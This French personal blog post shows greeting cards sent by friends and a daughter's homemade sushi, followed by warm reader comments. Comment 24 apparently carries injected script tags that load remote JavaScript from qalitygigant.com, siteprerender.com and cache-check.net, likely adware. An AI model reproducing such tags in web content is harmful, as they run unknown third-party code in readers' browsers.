• Dans ma Bal...

     

     

    Dans ma Bal...

     

    [ A Retrouver dans la Rubrique "Bal"-"Hiver" ICI ]

     

     

    Je vous retrouve aujourd'hui pour une visite de ma Bal, voici ce que j'ai reçu, pour mon plus grand Bonheur, cette semaine...

     

     

    Dans ma Bal...

     

     

                   De Cristal 24 Son Blog.....Dans ma Bal...

     

     

     

     

    Dans ma Bal...

     

     

     

     

    Dans ma Bal...

     

     

    D'Hélène-Chipounettenet Son Blog.....Dans ma Bal...

     

     

     

     

    Dans ma Bal...

     

     

     

     

    Dans ma Bal...

     

     

     

     

    Dans ma Bal...

     

     

    A Toutes les deux mes fidèles Amies... Je vous dis...

     

     

     

     

    Dans ma Bal...

     

     

    [ A Retrouver dans la Rubrique "Merci"-"Divers" ICI ]

     

     

     

     

    Dans ma Bal...

     

     

    Je vous montre ce que notre Puce nous a fait il y a deux jours... Des sushis : Un Régal !

     

     

     

     

     

    Dans ma Bal...

     

     

    Prenez soin de vous....

    Je vous dis à Lundi

     

     

     

     

    Dans ma Bal...

     

     

     

     

    Dans ma Bal...

     

    [ A Retrouver dans la Rubrique "Jours"-"Samedi"-"Hiver" ICI ]

    [ Décliné en "Bon Week-end" à retrouver dans Rubrique du même nom "Hiver-Noël" ICI ]

     

     


    Tags Tags : , , , , , ,
  • Commentaires

    31
    Gaelle
    Jeudi 26 Novembre 2020 à 13:32
    Merci pour tous ces gifs, et bravo a ta fille car c'est beaucoup de travail les sushi et les makis
    Biz
    Gaelle
    30
    Mercredi 25 Novembre 2020 à 19:26

    tes amies ton envoyées de belles cartes bravo a elle

    bisous

    29
    Mercredi 25 Novembre 2020 à 18:37
    dane

    hummm ça doit être succulent j' adore ça et ravie pour ta jolie BAL c' est super bisous bisous 

    28
    Mardi 24 Novembre 2020 à 07:24

    De jolis présents dans ta bal Valie et les sushi de ta puces ont l'air si bons. Je te souhaite une bonne journée et en bout peut-être l'espoir de se libérer un peu des contraintes pénibles contre le covid. Bises et amitié.

    27
    Jacline-H-49
    Lundi 23 Novembre 2020 à 17:07

    le bonheur se niche dans ta BAL ! Je te vois frétiller de plaisir, hi hi ! 

    je n'ai jamais manger de sushis, j'aurais bien voulu gouter à ceux faits par ta fille qui a l'air de bien s'y connaitre. 

    Je vais peut être me répéter, mais j'adore ta bannière, félicitations. 

    GROS GROS BISOUS TENDRESSE de 

    Jacline 

     

    26
    Lundi 23 Novembre 2020 à 09:52

    Bonjour, comme toujours de superbes bannières, je suis vraiment une fan de vos réalisations, bonne continuations et bravo,, belle journée

    25
    Lundi 23 Novembre 2020 à 08:38

    De chouettes attentions reçues. Et des sushis préparé avec amour qui t'ont apparemment fait bien plaisir ! 

    Bises

    Thaly

    24
    mamijojo77100
    Dimanche 22 Novembre 2020 à 20:40

    je reviens de nouveau j avais tente de mettre un com et comme je voyais la roulette qui tournait sans arret je me doutait que le com ne passerait pas..!!!voila deux jolies cartes des copines qui font du bien..Tu sais valie je n ai tjs pas trouve la solution pour supprimer le blabla qui vient se coller a mon com.. SI QQX sais comment faire POUR SUPPRIMER c est avec plaisir que je prends !!!  J ai deja essayer plusieurs solutions mais rien ne marche..merci d avance. GBISOUS ET BONNE SEMAINE

    ah j oubliais !! bravo a ta future cuisiniere !!!qui est bien SERIEUSE  

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1606073599831" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    23
    Dimanche 22 Novembre 2020 à 19:20

    Deux beaux présents dans ta BAL

    Je pense que la dégustation des sushis fait par ta fille a été bonne

    Bonne soirée

    Bisous

    22
    Dimanche 22 Novembre 2020 à 18:52

    une très belle bal . et bravo a ta puce bonne soirée bisous liliane

    21
    Dimanche 22 Novembre 2020 à 14:59

    c'est vraiment sympa ces marques d'amitié !

    Côté cuisine vous vous êtes sûrement régalés ; 

    bon après-midi ; bisous / Nicole

    20
    Dimanche 22 Novembre 2020 à 11:57

    Hmm des sushis !!! Miam !! Bravo à ta fille ! Et bravo à la Copinette qui t'as aussi gâtée !! 

    Gros Bisous et Bon dimanche 

    19
    Dimanche 22 Novembre 2020 à 08:17

    De gentilles attentions, bravo aux aminettes et heureuse pour toi!

    Ta fille est bien concentrée lol

    Bisous et beau dimanche

    18
    Dimanche 22 Novembre 2020 à 08:13

    Ha notre Cristal au grand cœur à encore "frappé". Bravo à toutes les deux

    Bon dimanche. Bisous

    17
    Dimanche 22 Novembre 2020 à 08:11

    Bravo aux copines pour leur belles cartes et bravo à la cuisinière !!

    Bon dimanche Valie !

    Bisous bisous !

    16
    Qinoa
    Samedi 21 Novembre 2020 à 20:55
    De jolies choses dans ta bal
    Bzz
    15
    Jeannine (cristal24)
    Samedi 21 Novembre 2020 à 19:29

    Contente de t'avoir fait plaisir avec ma carte, et jolie carte de ton amie Hélène.

    C'est bien d'avoir une petite cuisinière à la maison ! j'espère qu'ils ont été très bon ces sushis....ça donne envie.

    Bonne soirée et bonne fin de semaine.

    Bises.

    Jeannine

    14
    Samedi 21 Novembre 2020 à 18:37

    Une belle bien sympa à découvrir ! Bravo à ta fille ! Perso, je n'aime pas trop les sushis mais faits avec amour ça doit être super bon ! Bonne soirée ! Gros bisous

    13
    Samedi 21 Novembre 2020 à 17:49

    Une bien belle BAL, Bravo aux copinettes.

    Bravo également à ta Fifille, vous vous êtes bien régalés !!

    Prenez bien soin de vous, 

    Mille Bisous tout doux.

    12
    Samedi 21 Novembre 2020 à 17:35

    Bravo aux auteures de cette super BAL que tas su apprécier. J'ai pu voir que Puce était une excellente cuisinière... Comme vous avez dû vous régaler!

    J'espère que tout va bien et que dimanche s'annonce bien! Gros bisous

    11
    Samedi 21 Novembre 2020 à 17:08

    Coucou ma belle Valie, tu as reçu de magnifiques cartes et tu le mérites bien. Merci pour les nouveaux gifs. Passe une belle fin de journée, ici 0 degrés. Bisou rose tendresse !

    10
    Samedi 21 Novembre 2020 à 16:14

    super ta BAL ! de jolies présents

    bravo à ta puce ! délicieux

    bisous et bon week end

    9
    Samedi 21 Novembre 2020 à 16:12

    Bonjour Valie, très jolies ces cartes, et merci pour les tiennes et petits mots, je les garde en favoris

    Les "sushis" sont appétissants, bravo !

    Bon samedi, merci !

     

    8
    Samedi 21 Novembre 2020 à 15:24
    coucou VALIE j'espère que ton samedi se passe bien ? le mien calme courses et pharmacie ce matin du coup ils m'ont le vaccin pour la grippe , le weekend et là mais qu'est-ce le weekend en ces temps de confinement...... chez nous pas de gelée ce matin mais soleil et moins de vent , bonne fin de journée et bon weekend ... bisous ..Frane
    7
    Samedi 21 Novembre 2020 à 15:03
    lamanuelle25

    Belle bal à bonheur, bravo aux créatrices! Bises Nadine

    6
    Samedi 21 Novembre 2020 à 14:29
    ça fait plaisir ce courrier ! Bravo à ta fille pour les suhis. Bon W. End. Bisous.
    5
    Samedi 21 Novembre 2020 à 13:40

    De jolies cartes reçues des copinettes!! Bravo à ta fille pour sa préparation......

    Bisous et doux week-end

    4
    marianne pirotte
    Samedi 21 Novembre 2020 à 13:11

    De bien jolies cartes reçues !!

    Bravo à ta fifille, elle est très concentrée sur son travail

    Gros bisous

    Marianne

    3
    Samedi 21 Novembre 2020 à 09:56

    Bon samedi tout en soleil chez moi ma Valie et bon week end moi aussi je poste ce amtin et ensuite je reviens lundi un peu de repos fait du bien, tout est beau de ce que tu as reçu tu vois comme tu es aimé je le sais bien que les gens savent faire le distinguo entre ce qui a des valeurs en amitie et ce qui n en a pas et qui ne mérite pas le détour, bisous tendresse ma douce et profite de ta famille 

    2
    Jour de mai
    Samedi 21 Novembre 2020 à 09:38

    Coucou Valie, 

    Une super bal à bonheur, elles sont super courageuses les copinautes et cela n'a été que du bonheur pour toi. C'était fait pour. 

    Quant à ta puce, elle était super concentrée mais je vois aussi que vous êtes bien équipés pour faire ce genre de mets. Bravo à Mademoiselle, une très belle réussite. 

    Brrh fait froid ce matin mais c'est mieux même pour faire une petite balade. 

    Bon Samedi suivi d'un excellent dimanche. 

    Gros bisous ♥♥♥♥

    1
    Samedi 21 Novembre 2020 à 09:27

    Bonjour Valie, une super BAL à bonheur qui t'a ravie, c'est fait pour !!!

    Fanélie est concentré dans sa réalisation de sushis

    bravo miss c'est une belle réussite..

    Bonne et douce journée

    Bisous de Pat

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :